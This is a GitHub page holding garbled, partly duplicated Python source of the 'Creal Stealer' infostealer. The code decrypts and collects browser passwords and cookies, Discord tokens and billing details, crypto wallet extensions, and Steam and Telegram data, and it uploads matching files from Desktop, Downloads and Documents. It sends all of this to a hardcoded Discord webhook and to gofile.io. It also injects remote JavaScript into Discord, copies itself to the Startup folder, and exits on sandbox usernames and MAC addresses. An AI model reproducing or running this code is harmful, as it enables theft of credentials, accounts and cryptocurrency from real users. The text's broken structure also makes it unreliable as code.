You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
`import os
import threading
from sys import executable
from sqlite3 import connect as sql_connect
import re
from base64 import b64decode
from json import loads as json_loads, load
from ctypes import windll, wintypes, byref, cdll, Structure, POINTER, c_char, c_buffer
from urllib.request import Request, urlopen
from json import *
import time
import shutil
from zipfile import ZipFile
import random
import re
import subprocess
import sys
import shutil
import uuid
import socket
import getpass
import ssl
def L04dR3qu3sTs(methode, url, data='', files='', headers=''):
for i in range(8):
try:
if methode == 'POST':
if data != '':
r = requests.post(url, data=data)
if r.status_code == 200:
return r
elif files != '':
r = requests.post(url, files=files)
if r.status_code == 200 or r.status_code == 413:
return r
except:
pass
def L04durl1b(wh00k, data='', files='', headers=''):
for i in range(8):
try:
if headers != '':
r = urlopen(Request(wh00k, data=data, headers=headers))
return r
else:
r = urlopen(Request(wh00k, data=data))
return r
except:
pass
if b1ll1ngjson == []: return "```None```"
b1ll1ng = ""
for methode in b1ll1ngjson:
if methode["invalid"] == False:
if methode["type"] == 1:
b1ll1ng += ":credit_card:"
elif methode["type"] == 2:
b1ll1ng += ":parking: "
return b1ll1ng
def inj_discord():
username = os.getlogin()
folder_list = ['Discord', 'DiscordCanary', 'DiscordPTB', 'DiscordDevelopment']
for folder_name in folder_list:
deneme_path = os.path.join(os.getenv('LOCALAPPDATA'), folder_name)
if os.path.isdir(deneme_path):
for subdir, dirs, files in os.walk(deneme_path):
if 'app-' in subdir:
for dir in dirs:
if 'modules' in dir:
module_path = os.path.join(subdir, dir)
for subsubdir, subdirs, subfiles in os.walk(module_path):
if 'discord_desktop_core-' in subsubdir:
for subsubsubdir, subsubdirs, subsubfiles in os.walk(subsubdir):
if 'discord_desktop_core' in subsubsubdir:
for file in subsubfiles:
if file == 'index.js':
file_path = os.path.join(subsubsubdir, file)
inj_content = requests.get(inj_url).text
inj_content = inj_content.replace("%WEBHOOK%", wh00k)
with open(file_path, "w", encoding="utf-8") as index_file:
index_file.write(inj_content)
if os.path.abspath(filePath).lower() != os.path.abspath(startupFilePath).lower():
with open(filePath, 'rb') as src_file, open(startupFilePath, 'wb') as dst_file:
shutil.copyfileobj(src_file, dst_file)
def R4f0rm3t(listt):
e = re.findall("(\w+[a-z])",listt)
while "https" in e: e.remove("https")
while "com" in e: e.remove("com")
while "net" in e: e.remove("net")
return list(set(e))
if name == "crcook":
rb = ' | '.join(da for da in cookiWords)
if len(rb) > 1000:
rrrrr = R4f0rm3t(str(cookiWords))
rb = ' | '.join(da for da in rrrrr)
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"title": "Creal | Cookies Stealer",
"description": f"<:apollondelirmis:1012370180845883493>: **Accounts:**\n\n{rb}\n\n**Data:**\n<:cookies_tlm:816619063618568234> • **{CookiCount}** Cookies Found\n<a:CH_IconArrowRight:715585320178941993> • [CrealCookies.txt]({link})",
"color": 2895667,
"footer": {
"text": "Creal Stealer",
"icon_url": "https://raw.githubusercontent.com/Ayhuuu/Creal-Stealer/main/img/xd.jpg"
}
}
],
"username": "Creal Stealer",
"avatar_url": "https://raw.githubusercontent.com/Ayhuuu/Creal-Stealer/main/img/xd.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
if name == "crpassw":
ra = ' | '.join(da for da in paswWords)
if len(ra) > 1000:
rrr = R4f0rm3t(str(paswWords))
ra = ' | '.join(da for da in rrr)
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"title": "Creal | Password Stealer",
"description": f"<:apollondelirmis:1012370180845883493>: **Accounts**:\n{ra}\n\n**Data:**\n<a:hira_kasaanahtari:886942856969875476> • **{P4sswCount}** Passwords Found\n<a:CH_IconArrowRight:715585320178941993> • [CrealPassword.txt]({link})",
"color": 2895667,
"footer": {
"text": "Creal Stealer",
"icon_url": "https://raw.githubusercontent.com/Ayhuuu/Creal-Stealer/main/img/xd.jpg"
}
}
],
"username": "Creal",
"avatar_url": "https://raw.githubusercontent.com/Ayhuuu/Creal-Stealer/main/img/xd.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
if name == "kiwi":
data = {
"content": f"{globalInfo()}",
"embeds": [
{
"color": 2895667,
"fields": [
{
"name": "Interesting files found on user PC:",
"value": link
}
],
"author": {
"name": "Creal | File Stealer"
},
"footer": {
"text": "Creal Stealer",
"icon_url": "https://raw.githubusercontent.com/Ayhuuu/Creal-Stealer/main/img/xd.jpg"
}
}
],
"username": "Creal Stealer",
"avatar_url": "https://raw.githubusercontent.com/Ayhuuu/Creal-Stealer/main/img/xd.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
return
def wr1tef0rf1l3(data, name):
path = os.getenv("TEMP") + f"\cr{name}.txt"
with open(path, mode='w', encoding='utf-8') as f:
f.write(f"<--Creal STEALER BEST -->\n\n")
for line in data:
if line[0] != '':
f.write(f"{line}\n")
T0k3ns = ''
def getT0k3n(path, arg):
if not os.path.exists(path): return
path += arg
for file in os.listdir(path):
if file.endswith(".log") or file.endswith(".ldb") :
for line in [x.strip() for x in open(f"{path}\\{file}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}", r"mfa\.[\w-]{80,95}"):
for t0k3n in re.findall(regex, line):
global T0k3ns
if ch1ckT4k1n(t0k3n):
if not t0k3n in T0k3ns:
T0k3ns += t0k3n
upl05dT4k31(t0k3n, path)
P4ssw = []
def getP4ssw(path, arg):
global P4ssw, P4sswCount
if not os.path.exists(path): return
pathC = path + arg + "/Login Data"
if os.stat(pathC).st_size == 0: return
tempfold = temp + "cr" + ''.join(random.choice('bcdefghijklmnopqrstuvwxyz') for i in range(8)) + ".db"
shutil.copy2(pathC, tempfold)
conn = sql_connect(tempfold)
cursor = conn.cursor()
cursor.execute("SELECT action_url, username_value, password_value FROM logins;")
data = cursor.fetchall()
cursor.close()
conn.close()
os.remove(tempfold)
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
for row in data:
if row[0] != '':
for wa in keyword:
old = wa
if "https" in wa:
tmp = wa
wa = tmp.split('[')[1].split(']')[0]
if wa in row[0]:
if not old in paswWords: paswWords.append(old)
P4ssw.append(f"UR1: {row[0]} | U53RN4M3: {row[1]} | P455W0RD: {D3kryptV4lU3(row[2], master_key)}")
P4sswCount += 1
wr1tef0rf1l3(P4ssw, 'passw')
C00k13 = []
def getC00k13(path, arg):
global C00k13, CookiCount
if not os.path.exists(path): return
pathC = path + arg + "/Cookies"
if os.stat(pathC).st_size == 0: return
tempfold = temp + "cr" + ''.join(random.choice('bcdefghijklmnopqrstuvwxyz') for i in range(8)) + ".db"
shutil.copy2(pathC, tempfold)
conn = sql_connect(tempfold)
cursor = conn.cursor()
cursor.execute("SELECT host_key, name, encrypted_value FROM cookies")
data = cursor.fetchall()
cursor.close()
conn.close()
os.remove(tempfold)
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
for row in data:
if row[0] != '':
for wa in keyword:
old = wa
if "https" in wa:
tmp = wa
wa = tmp.split('[')[1].split(']')[0]
if wa in row[0]:
if not old in cookiWords: cookiWords.append(old)
C00k13.append(f"{row[0]} TRUE / FALSE 2597573456 {row[1]} {D3kryptV4lU3(row[2], master_key)}")
CookiCount += 1
wr1tef0rf1l3(C00k13, 'cook')
def G3tD1sc0rd(path, arg):
if not os.path.exists(f"{path}/Local State"): return
pathC = path + arg
pathKey = path + "/Local State"
with open(pathKey, 'r', encoding='utf-8') as f: local_state = json_loads(f.read())
master_key = b64decode(local_state['os_crypt']['encrypted_key'])
master_key = CryptUnprotectData(master_key[5:])
for file in os.listdir(pathC):
if file.endswith(".log") or file.endswith(".ldb") :
for line in [x.strip() for x in open(f"{pathC}\\{file}", errors="ignore").readlines() if x.strip()]:
for t0k3n in re.findall(r"dQw4w9WgXcQ:[^.*\['(.*)'\].*$][^\"]*", line):
global T0k3ns
t0k3nDecoded = D3kryptV4lU3(b64decode(t0k3n.split('dQw4w9WgXcQ:')[1]), master_key)
if ch1ckT4k1n(t0k3nDecoded):
if not t0k3nDecoded in T0k3ns:
T0k3ns += t0k3nDecoded
upl05dT4k31(t0k3nDecoded, path)
def GatherZips(paths1, paths2, paths3):
thttht = []
for patt in paths1:
a = threading.Thread(target=Z1pTh1ngs, args=[patt[0], patt[5], patt[1]])
a.start()
thttht.append(a)
for patt in paths2:
a = threading.Thread(target=Z1pTh1ngs, args=[patt[0], patt[2], patt[1]])
a.start()
thttht.append(a)
a = threading.Thread(target=ZipTelegram, args=[paths3[0], paths3[2], paths3[1]])
a.start()
thttht.append(a)
for thread in thttht:
thread.join()
global WalletsZip, GamingZip, OtherZip
wal, ga, ot = "",'',''
if not len(WalletsZip) == 0:
wal = ":coin: • Wallets\n"
for i in WalletsZip:
wal += f"└─ [{i[0]}]({i[1]})\n"
if not len(WalletsZip) == 0:
ga = ":video_game: • Gaming:\n"
for i in GamingZip:
ga += f"└─ [{i[0]}]({i[1]})\n"
if not len(OtherZip) == 0:
ot = ":tickets: • Apps\n"
for i in OtherZip:
ot += f"└─ [{i[0]}]({i[1]})\n"
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
data = {
"content": globalInfo(),
"embeds": [
{
"title": "Creal Zips",
"description": f"{wal}\n{ga}\n{ot}",
"color": 2895667,
"footer": {
"text": "Creal Stealer",
"icon_url": "https://raw.githubusercontent.com/Ayhuuu/Creal-Stealer/main/img/xd.jpg"
}
}
],
"username": "Creal Stealer",
"avatar_url": "https://raw.githubusercontent.com/Ayhuuu/Creal-Stealer/main/img/xd.jpg",
"attachments": []
}
L04durl1b(wh00k, data=dumps(data).encode(), headers=headers)
def ZipTelegram(path, arg, procc):
global OtherZip
pathC = path
name = arg
if not os.path.exists(pathC): return
subprocess.Popen(f"taskkill /im {procc} /t /f >nul 2>&1", shell=True)
zf = ZipFile(f"{pathC}/{name}.zip", "w")
for file in os.listdir(pathC):
if not ".zip" in file and not "tdummy" in file and not "user_data" in file and not "webview" in file:
zf.write(pathC + "/" + file)
zf.close()
lnik = uploadToAnonfiles(f'{pathC}/{name}.zip')
os.remove(f"{pathC}/{name}.zip")
OtherZip.append([arg, lnik])
def Z1pTh1ngs(path, arg, procc):
pathC = path
name = arg
global WalletsZip, GamingZip, OtherZip
if "nkbihfbeogaeaoehlefnkodbefgpgknn" in arg:
browser = path.split("\\")[4].split("/")[1].replace(' ', '')
name = f"Metamask_{browser}"
pathC = path + arg
if "ejbalbakoplchlghecdalmeeeajnimhm" in arg:
browser = path.split("\\")[4].split("/")[1].replace(' ', '')
name = f"Metamask_Edge"
pathC = path + arg
if "aholpfdialjgjfhomihkjbmgjidlcdno" in arg:
browser = path.split("\\")[4].split("/")[1].replace(' ', '')
name = f"Exodus_{browser}"
pathC = path + arg
if "fhbohimaelbohpjbbldcngcnapndodjp" in arg:
browser = path.split("\\")[4].split("/")[1].replace(' ', '')
name = f"Binance_{browser}"
pathC = path + arg
if "hnfanknocfeofbddgcijnmhnfnkdnaad" in arg:
browser = path.split("\\")[4].split("/")[1].replace(' ', '')
name = f"Coinbase_{browser}"
pathC = path + arg
if "egjidjbpglichdcondbcbdnbeeppgdph" in arg:
browser = path.split("\\")[4].split("/")[1].replace(' ', '')
name = f"Trust_{browser}"
pathC = path + arg
if "bfnaelmomeimhlpmgjnjophhpkkoljpa" in arg:
browser = path.split("\\")[4].split("/")[1].replace(' ', '')
name = f"Phantom_{browser}"
pathC = path + arg
if not os.path.exists(pathC): return
subprocess.Popen(f"taskkill /im {procc} /t /f >nul 2>&1", shell=True)
if "Wallet" in arg or "NationsGlory" in arg:
browser = path.split("\\")[4].split("/")[1].replace(' ', '')
name = f"{browser}"
elif "Steam" in arg:
if not os.path.isfile(f"{pathC}/loginusers.vdf"): return
f = open(f"{pathC}/loginusers.vdf", "r+", encoding="utf8")
data = f.readlines()
found = False
for l in data:
if 'RememberPassword"\t\t"1"' in l:
found = True
if found == False: return
name = arg
zf = ZipFile(f"{pathC}/{name}.zip", "w")
for file in os.listdir(pathC):
if not ".zip" in file: zf.write(pathC + "/" + file)
zf.close()
lnik = uploadToAnonfiles(f'{pathC}/{name}.zip')
os.remove(f"{pathC}/{name}.zip")
if "Wallet" in arg or "eogaeaoehlef" in arg or "koplchlghecd" in arg or "aelbohpjbbld" in arg or "nocfeofbddgc" in arg or "bpglichdcond" in arg or "momeimhlpmgj" in arg or "dialjgjfhomi" in arg:
WalletsZip.append([name, lnik])
elif "NationsGlory" in name or "Steam" in name or "RiotCli" in name:
GamingZip.append([name, lnik])
else:
OtherZip.append([name, lnik])
`import os
import threading
from sys import executable
from sqlite3 import connect as sql_connect
import re
from base64 import b64decode
from json import loads as json_loads, load
from ctypes import windll, wintypes, byref, cdll, Structure, POINTER, c_char, c_buffer
from urllib.request import Request, urlopen
from json import *
import time
import shutil
from zipfile import ZipFile
import random
import re
import subprocess
import sys
import shutil
import uuid
import socket
import getpass
import ssl
ssl._create_default_https_context = ssl._create_unverified_context
blacklistUsers = ['WDAGUtilityAccount', '3W1GJT', 'QZSBJVWM', '5ISYH9SH', 'Abby', 'hmarc', 'patex', 'RDhJ0CNFevzX', 'kEecfMwgj', 'Frank', '8Nl0ColNQ5bq', 'Lisa', 'John', 'george', 'PxmdUOpVyx', '8VizSM', 'w0fjuOVmCcP5A', 'lmVwjj9b', 'PqONjHVwexsS', '3u2v9m8', 'Julia', 'HEUeRzl', 'fred', 'server', 'BvJChRPnsxn', 'Harry Johnson', 'SqgFOf3G', 'Lucas', 'mike', 'PateX', 'h7dk1xPr', 'Louise', 'User01', 'test', 'RGzcBUyrznReg']
username = getpass.getuser()
if username.lower() in blacklistUsers:
os._exit(0)
def kontrol():
kontrol()
BLACKLIST1 = ['00:15:5d:00:07:34', '00:e0:4c:b8:7a:58', '00:0c:29:2c:c1:21', '00:25:90:65:39:e4', 'c8:9f:1d:b6:58:e4', '00:25:90:36:65:0c', '00:15:5d:00:00:f3', '2e:b8:24:4d:f7:de', '00:15:5d:13:6d:0c', '00:50:56:a0:dd:00', '00:15:5d:13:66:ca', '56:e8:92:2e:76:0d', 'ac:1f:6b:d0:48:fe', '00:e0:4c:94:1f:20', '00:15:5d:00:05:d5', '00:e0:4c:4b:4a:40', '42:01:0a:8a:00:22', '00:1b:21:13:15:20', '00:15:5d:00:06:43', '00:15:5d:1e:01:c8', '00:50:56:b3:38:68', '60:02:92:3d:f1:69', '00:e0:4c:7b:7b:86', '00:e0:4c:46:cf:01', '42:85:07:f4:83:d0', '56:b0:6f:ca:0a:e7', '12:1b:9e:3c:a6:2c', '00:15:5d:00:1c:9a', '00:15:5d:00:1a:b9', 'b6:ed:9d:27:f4:fa', '00:15:5d:00:01:81', '4e:79:c0:d9:af:c3', '00:15:5d:b6:e0:cc', '00:15:5d:00:02:26', '00:50:56:b3:05:b4', '1c:99:57:1c:ad:e4', '08:00:27:3a:28:73', '00:15:5d:00:00:c3', '00:50:56:a0:45:03', '12:8a:5c:2a:65:d1', '00:25:90:36:f0:3b', '00:1b:21:13:21:26', '42:01:0a:8a:00:22', '00:1b:21:13:32:51', 'a6:24:aa:ae:e6:12', '08:00:27:45:13:10', '00:1b:21:13:26:44', '3c:ec:ef:43:fe:de', 'd4:81:d7:ed:25:54', '00:25:90:36:65:38', '00:03:47:63:8b:de', '00:15:5d:00:05:8d', '00:0c:29:52:52:50', '00:50:56:b3:42:33', '3c:ec:ef:44:01:0c', '06:75:91:59:3e:02', '42:01:0a:8a:00:33', 'ea:f6:f1:a2:33:76', 'ac:1f:6b:d0:4d:98', '1e:6c:34:93:68:64', '00:50:56:a0:61:aa', '42:01:0a:96:00:22', '00:50:56:b3:21:29', '00:15:5d:00:00:b3', '96:2b:e9:43:96:76', 'b4:a9:5a:b1:c6:fd', 'd4:81:d7:87:05:ab', 'ac:1f:6b:d0:49:86', '52:54:00:8b:a6:08', '00:0c:29:05:d8:6e', '00:23:cd:ff:94:f0', '00:e0:4c:d6:86:77', '3c:ec:ef:44:01:aa', '00:15:5d:23:4c:a3', '00:1b:21:13:33:55', '00:15:5d:00:00:a4', '16:ef:22:04:af:76', '00:15:5d:23:4c:ad', '1a:6c:62:60:3b:f4', '00:15:5d:00:00:1d', '00:50:56:a0:cd:a8', '00:50:56:b3:fa:23', '52:54:00:a0:41:92', '00:50:56:b3:f6:57', '00:e0:4c:56:42:97', 'ca:4d:4b:ca:18:cc', 'f6:a5:41:31:b2:78', 'd6:03:e4:ab:77:8e', '00:50:56:ae:b2:b0', '00:50:56:b3:94:cb', '42:01:0a:8e:00:22', '00:50:56:b3:4c:bf', '00:50:56:b3:09:9e', '00:50:56:b3:38:88', '00:50:56:a0:d0:fa', '00:50:56:b3:91:c8', '3e:c1:fd:f1:bf:71', '00:50:56:a0:6d:86', '00:50:56:a0:af:75', '00:50:56:b3:dd:03', 'c2:ee:af:fd:29:21', '00:50:56:b3:ee:e1', '00:50:56:a0:84:88', '00:1b:21:13:32:20', '3c:ec:ef:44:00:d0', '00:50:56:ae:e5:d5', '00:50:56:97:f6:c8', '52:54:00:ab:de:59', '00:50:56:b3:9e:9e', '00:50:56:a0:39:18', '32:11:4d:d0:4a:9e', '00:50:56:b3:d0:a7', '94:de:80:de:1a:35', '00:50:56:ae:5d:ea', '00:50:56:b3:14:59', 'ea:02:75:3c:90:9f', '00:e0:4c:44:76:54', 'ac:1f:6b:d0:4d:e4', '52:54:00:3b:78:24', '00:50:56:b3:50:de', '7e:05:a3:62:9c:4d', '52:54:00:b3:e4:71', '90:48:9a:9d:d5:24', '00:50:56:b3:3b:a6', '92:4c:a8:23:fc:2e', '5a:e2:a6:a4:44:db', '00:50:56:ae:6f:54', '42:01:0a:96:00:33', '00:50:56:97:a1:f8', '5e:86:e4:3d:0d:f6', '00:50:56:b3:ea:ee', '3e:53:81:b7:01:13', '00:50:56:97:ec:f2', '00:e0:4c:b3:5a:2a', '12:f8:87:ab:13:ec', '00:50:56:a0:38:06', '2e:62:e8:47:14:49', '00:0d:3a:d2:4f:1f', '60:02:92:66:10:79', '', '00:50:56:a0:d7:38', 'be:00:e5:c5:0c:e5', '00:50:56:a0:59:10', '00:50:56:a0:06:8d', '00:e0:4c:cb:62:08', '4e:81:81:8e:22:4e']
mac_address = uuid.getnode()
if str(uuid.UUID(int=mac_address)) in BLACKLIST1:
os._exit(0)
wh00k = "https://discord.com/api/webhooks/1135210408488226897/SiqMbxsZNxJF5rcxk5LBOqEyW7HfvFPPAJsKop4IUUzY3H4UfZN1SQcPL_0h2SCU-RBV"
inj_url = "https://raw.githubusercontent.com/Ayhuuu/injection/main/index.js"
DETECTED = False
def g3t1p():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
requirements = [
["requests", "requests"],
["Crypto.Cipher", "pycryptodome"],
]
for modl in requirements:
try: import(modl[0])
except:
subprocess.Popen(f"{executable} -m pip install {modl[1]}", shell=True)
time.sleep(3)
import requests
from Crypto.Cipher import AES
local = os.getenv('LOCALAPPDATA')
roaming = os.getenv('APPDATA')
temp = os.getenv("TEMP")
Threadlist = []
class DATA_BLOB(Structure):
fields = [
('cbData', wintypes.DWORD),
('pbData', POINTER(c_char))
]
def G3tD4t4(blob_out):
cbData = int(blob_out.cbData)
pbData = blob_out.pbData
buffer = c_buffer(cbData)
cdll.msvcrt.memcpy(buffer, pbData, cbData)
windll.kernel32.LocalFree(pbData)
return buffer.raw
def CryptUnprotectData(encrypted_bytes, entropy=b''):
buffer_in = c_buffer(encrypted_bytes, len(encrypted_bytes))
buffer_entropy = c_buffer(entropy, len(entropy))
blob_in = DATA_BLOB(len(encrypted_bytes), buffer_in)
blob_entropy = DATA_BLOB(len(entropy), buffer_entropy)
blob_out = DATA_BLOB()
def D3kryptV4lU3(buff, master_key=None):
starts = buff.decode(encoding='utf8', errors='ignore')[:3]
if starts == 'v10' or starts == 'v11':
iv = buff[3:15]
payload = buff[15:]
cipher = AES.new(master_key, AES.MODE_GCM, iv)
decrypted_pass = cipher.decrypt(payload)
decrypted_pass = decrypted_pass[:-16].decode()
return decrypted_pass
def L04dR3qu3sTs(methode, url, data='', files='', headers=''):
for i in range(8):
try:
if methode == 'POST':
if data != '':
r = requests.post(url, data=data)
if r.status_code == 200:
return r
elif files != '':
r = requests.post(url, files=files)
if r.status_code == 200 or r.status_code == 413:
return r
except:
pass
def L04durl1b(wh00k, data='', files='', headers=''):
for i in range(8):
try:
if headers != '':
r = urlopen(Request(wh00k, data=data, headers=headers))
return r
else:
r = urlopen(Request(wh00k, data=data))
return r
except:
pass
def globalInfo():
ip = g3t1p()
us3rn4m1 = os.getenv("USERNAME")
ipdatanojson = urlopen(Request(f"https://geolocation-db.com/jsonp/{ip}")).read().decode().replace('callback(', '').replace('})', '}')
def TR6st(C00k13):
def G3tUHQFr13ndS(t0k3n):
b4dg3List = [
{"Name": 'Active_Developer', 'Value': 131072, 'Emoji': "<:activedev:1042545590640324608> "},
{"Name": 'Early_Verified_Bot_Developer', 'Value': 131072, 'Emoji': "<:developer:874750808472825986> "},
{"Name": 'Bug_Hunter_Level_2', 'Value': 16384, 'Emoji': "<:bughunter_2:874750808430874664> "},
{"Name": 'Early_Supporter', 'Value': 512, 'Emoji': "<:early_supporter:874750808414113823> "},
{"Name": 'House_Balance', 'Value': 256, 'Emoji': "<:balance:874750808267292683> "},
{"Name": 'House_Brilliance', 'Value': 128, 'Emoji': "<:brilliance:874750808338608199> "},
{"Name": 'House_Bravery', 'Value': 64, 'Emoji': "<:bravery:874750808388952075> "},
{"Name": 'Bug_Hunter_Level_1', 'Value': 8, 'Emoji': "<:bughunter_1:874750808426692658> "},
{"Name": 'HypeSquad_Events', 'Value': 4, 'Emoji': "<:hypesquad_events:874750808594477056> "},
{"Name": 'Partnered_Server_Owner', 'Value': 2,'Emoji': "<:partner:874750808678354964> "},
{"Name": 'Discord_Employee', 'Value': 1, 'Emoji': "<:staff:874750808728666152> "}
]
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
friendlist = loads(urlopen(Request("https://discord.com/api/v6/users/@me/relationships", headers=headers)).read().decode())
except:
return False
process_list = os.popen('tasklist').readlines()
for process in process_list:
if "Discord" in process:
def G3tb1ll1ng(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
b1ll1ngjson = loads(urlopen(Request("https://discord.com/api/users/@me/billing/payment-sources", headers=headers)).read().decode())
except:
return False
def inj_discord():
inj_discord()
def G3tB4dg31(flags):
if flags == 0: return ''
def G3tT0k4n1nf9(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
def ch1ckT4k1n(t0k3n):
headers = {
"Authorization": t0k3n,
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
try:
urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=headers))
return True
except:
return False
if getattr(sys, 'frozen', False):
currentFilePath = os.path.dirname(sys.executable)
else:
currentFilePath = os.path.dirname(os.path.abspath(file))
fileName = os.path.basename(sys.argv[0])
filePath = os.path.join(currentFilePath, fileName)
startupFolderPath = os.path.join(os.path.expanduser('~'), 'AppData', 'Roaming', 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup')
startupFilePath = os.path.join(startupFolderPath, fileName)
if os.path.abspath(filePath).lower() != os.path.abspath(startupFilePath).lower():
with open(filePath, 'rb') as src_file, open(startupFilePath, 'wb') as dst_file:
shutil.copyfileobj(src_file, dst_file)
def upl05dT4k31(t0k3n, path):
global wh00k
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
us3rn4m1, hashtag, em31l, idd, pfp, flags, n1tr0, ph0n3 = G3tT0k4n1nf9(t0k3n)
def R4f0rm3t(listt):
e = re.findall("(\w+[a-z])",listt)
while "https" in e: e.remove("https")
while "com" in e: e.remove("com")
while "net" in e: e.remove("net")
return list(set(e))
def upload(name, link):
headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0"
}
def wr1tef0rf1l3(data, name):
path = os.getenv("TEMP") + f"\cr{name}.txt"
with open(path, mode='w', encoding='utf-8') as f:
f.write(f"<--Creal STEALER BEST -->\n\n")
for line in data:
if line[0] != '':
f.write(f"{line}\n")
T0k3ns = ''
def getT0k3n(path, arg):
if not os.path.exists(path): return
P4ssw = []
def getP4ssw(path, arg):
global P4ssw, P4sswCount
if not os.path.exists(path): return
C00k13 = []
def getC00k13(path, arg):
global C00k13, CookiCount
if not os.path.exists(path): return
def G3tD1sc0rd(path, arg):
if not os.path.exists(f"{path}/Local State"): return
def GatherZips(paths1, paths2, paths3):
thttht = []
for patt in paths1:
a = threading.Thread(target=Z1pTh1ngs, args=[patt[0], patt[5], patt[1]])
a.start()
thttht.append(a)
def ZipTelegram(path, arg, procc):
global OtherZip
pathC = path
name = arg
if not os.path.exists(pathC): return
subprocess.Popen(f"taskkill /im {procc} /t /f >nul 2>&1", shell=True)
def Z1pTh1ngs(path, arg, procc):
pathC = path
name = arg
global WalletsZip, GamingZip, OtherZip
def GatherAll():
' Default Path < 0 > ProcesName < 1 > Token < 2 > Password < 3 > Cookies < 4 > Extentions < 5 > '
browserPaths = [
[f"{roaming}/Opera Software/Opera GX Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{roaming}/Opera Software/Opera Stable", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{roaming}/Opera Software/Opera Neon/User Data/Default", "opera.exe", "/Local Storage/leveldb", "/", "/Network", "/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/Google/Chrome/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/Google/Chrome SxS/User Data", "chrome.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/BraveSoftware/Brave-Browser/User Data", "brave.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/Yandex/YandexBrowser/User Data", "yandex.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/HougaBouga/nkbihfbeogaeaoehlefnkodbefgpgknn" ],
[f"{local}/Microsoft/Edge/User Data", "edge.exe", "/Default/Local Storage/leveldb", "/Default", "/Default/Network", "/Default/Local Extension Settings/nkbihfbeogaeaoehlefnkodbefgpgknn" ]
]
def uploadToAnonfiles(path):
try:return requests.post(f'https://{requests.get("https://api.gofile.io/getServer").json()["data"]["server"]}.gofile.io/uploadFile', files={'file': open(path, 'rb')}).json()["data"]["downloadPage"]
except:return False
def KiwiFolder(pathF, keywords):
global KiwiFiles
maxfilesperdir = 7
i = 0
listOfFile = os.listdir(pathF)
ffound = []
for file in listOfFile:
if not os.path.isfile(pathF + "/" + file): return
i += 1
if i <= maxfilesperdir:
url = uploadToAnonfiles(pathF + "/" + file)
ffound.append([pathF + "/" + file, url])
else:
break
KiwiFiles.append(["folder", pathF + "/", ffound])
KiwiFiles = []
def KiwiFile(path, keywords):
global KiwiFiles
fifound = []
listOfFile = os.listdir(path)
for file in listOfFile:
for worf in keywords:
if worf in file.lower():
if os.path.isfile(path + "/" + file) and ".txt" in file:
fifound.append([path + "/" + file, uploadToAnonfiles(path + "/" + file)])
break
if os.path.isdir(path + "/" + file):
target = path + "/" + file
KiwiFolder(target, keywords)
break
def Kiwi():
user = temp.split("\AppData")[0]
path2search = [
user + "/Desktop",
user + "/Downloads",
user + "/Documents"
]
global keyword, cookiWords, paswWords, CookiCount, P4sswCount, WalletsZip, GamingZip, OtherZip
keyword = [
'mail', 'coinbase', 'sellix', 'gmail', 'steam', 'discord', 'riotgames', 'youtube', 'instagram', 'tiktok', 'twitter', 'facebook', 'card', 'epicgames', 'spotify', 'yahoo', 'roblox', 'twitch', 'minecraft', 'bank', 'paypal', 'origin', 'amazon', 'ebay', 'aliexpress', 'playstation', 'hbo', 'xbox', 'buy', 'sell', 'binance', 'hotmail', 'outlook', 'crunchyroll', 'telegram', 'pornhub', 'disney', 'expressvpn', 'crypto', 'uber', 'netflix'
]
CookiCount, P4sswCount = 0, 0
cookiWords = []
paswWords = []
WalletsZip = []
GamingZip = []
OtherZip = []
GatherAll()
DETECTED = TR6st(C00k13)
